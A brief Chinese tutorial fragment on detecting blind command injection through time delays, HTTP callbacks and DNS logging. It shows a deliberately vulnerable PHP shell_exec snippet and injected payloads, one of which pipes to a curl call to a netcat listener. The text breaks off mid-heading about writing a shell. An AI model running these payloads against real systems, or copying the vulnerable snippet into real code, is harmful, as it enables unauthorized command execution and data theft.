命令无回显的情况
判断方法
1.延时
2.HTTP请求
3.DNS请求
<?php
highlight_file(__FILE__);
shell_exec($_GET[1]);
?>
(1)通过传入1=ls|sleep(3)
页面加载3秒左右才显示来证明注入语句带入成功
传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000
(2)通过提前nc监听,利用curl命令进行信息获取
(3)提前注册ceye.io平台获取一个域名,该域名下的子域名被请求的信息都会被记录到平台上
其中DNS请求的使用范围多于HTTP请求,常用利用方式
写shell(直